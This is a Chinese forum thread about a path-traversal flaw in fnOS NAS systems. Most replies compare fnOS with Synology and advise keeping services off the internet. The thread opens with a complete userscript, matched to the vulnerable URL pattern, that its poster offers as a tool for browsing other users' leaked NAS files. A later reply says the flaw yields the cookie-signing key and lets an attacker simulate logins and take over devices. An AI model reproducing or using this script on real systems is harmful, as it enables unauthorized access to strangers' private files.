这个简单的油猴脚本就可以正常浏览用户泄露文件了

```Javascript
// ==UserScript==
// @name 路径遍历链接修复工具
// @namespace http://tampermonkey.net/
// @version 1.0
// @description 修复特定路径下的 LFI/目录遍历链接拼接问题
// @author xxx
// @match *://*/app-center-static/serviceicon/myapp/%7B0%7D/*
// @grant none
// ==/UserScript==

(function() {
'use strict';

// 获取当前页面的查询参数，即 ?size=../../../../ 部分
const currentSearch = window.location.search;
// 获取当前页面的基础路径，即 /app-center-static/serviceicon/myapp/%7B0%7D/
const currentPath = window.location.pathname;

// 选取所有的 <a> 标签
const links = document.querySelectorAll('a');

links.forEach(link => {
// 获取 HTML 中原本的 href 属性值（例如 "vol1/" 或 "bin"），而非浏览器解析后的完整 URL
const rawHref = link.getAttribute('href');

if (rawHref) {
// 核心逻辑：基础路径 + 原有查询参数 + 目标文件路径
// 结果：.../myapp/%7B0%7D/?size=../../../../vol1/
const newUrl = currentPath + currentSearch + rawHref;

// 修改链接的指向
link.href = newUrl;
}
});

console.log(`已修正 ${links.length} 个路径遍历链接。`);
})();
```

系统开放是怎么来的 😂，感觉飞牛那个系统不是封闭得一逼

群晖自己系统和套件都有 API 文档，套件不管是手动上传安装，还是第三方源，也能算是开放；飞牛现在第三方用的包括影视的 API 好像都是逆向出来的，套件也刚加入手动上传安装没多久吧，加之前就只能装官方商店的

飞牛影视是好用，我之前给朋友那边虚拟机装了一个，远程挂载媒体库嫖它个播放器，然后有了媒体库更新之后飞牛的影视库没法及时刷新的问题，想找找它刷新媒体库的 API ，发现压根没有开放的，基本上你就是得实现它签名的算法模拟它 App 来操作，发了个帖子问了下也没后文了 https://club.fnnas.com/forum.php?mod=viewthread&tid=45408

@Puteulanus 理念不等于实践，听说过 OpenAI 吗，可太 Open 了😅

fnOS 的 nginx 日志在 /usr/trim/nginx/logs/access.log ，可以借此查看有多少人来“共襄盛举”了

为什么不继续用群晖了群晖是有啥问题吗

一直都在用群晖

我看又发布了新版本

飞牛看起来确实伤人心，操作跟鸵鸟一样，遇到危险，把头埋在土里。

从 fnos 发布就在关注，在虚拟机上试了下，不符合我的习惯就再没用过，还好没用|ʘᗝʘ|。fn 的权限管理也很抽象，感觉文件管理也乱乱的应用商店下的 APP 配置文件都找不到。
推荐等 fnos 啥时候出和 cloudflare 一样的故障分析报告了再考虑用吧

我没有登录 fn connect 就没事了吧.

我 fn connect 没有打开, 说明不受这个漏洞影响对吧.

@ClutchBear01 网上一搜有很多办法监测是否泄露

基于上面的漏洞能够获取到用于登陆 cookie 加密计算的私钥，随便让 AI 搞了下，可以搞定模拟登陆，进入到用户 NAS 并进行任意操作。目前看了被种马的都是通过这个路径~
这个是如何计算的

https://mp.weixin.qq.com/s/LzkLcy92m5O24up_9c4NUA 凌晨 4 点已经发公告了。

顺便一提：没有绝对安全的系统/软件，谁也不知道哪里埋了个 0day 漏洞。
最佳实践就是不要暴露任何服务到公网，只使用 VPN 访问内网服务。必须暴露到公网的服务也使用 Docker 以非 root 权限运行，并且严格控制访问权限。

真没必要一踩一捧，我同时拥有群晖和飞牛。群晖更像给企业级用户使用的，飞牛更加现代化更加贴近普通用户。应该影响没那么大，不开公网就没事。能开公网做端口转发的，应该是平时喜欢折腾的人，看到消息肯定第一时间升级了。最安全的还是平时开个 VPN 去访问内网，不管是飞牛还是群晖，这样最保险。

绿联有类似问题么

没事老哥 8 年比我久点，我 918 ，人官方说现在就是最后一个版本了。未来如果不给更新了，有新漏洞也未必给修。换飞牛虽然官方可能装死，但毕竟是装死，还是能给你修的。这么想你就不觉得你更换产品的动作有问题嘞

还好就内网用下，备份完照片就关掉

这影响还不大……评论区这宽容度也太高了吧，他们知不知道官方的 FNconnect 也一样被爆破，总不能说开 FNID 的也是爱折腾的用户所以活该？

隐私泄漏的各位希望能积极维权，争取自身权益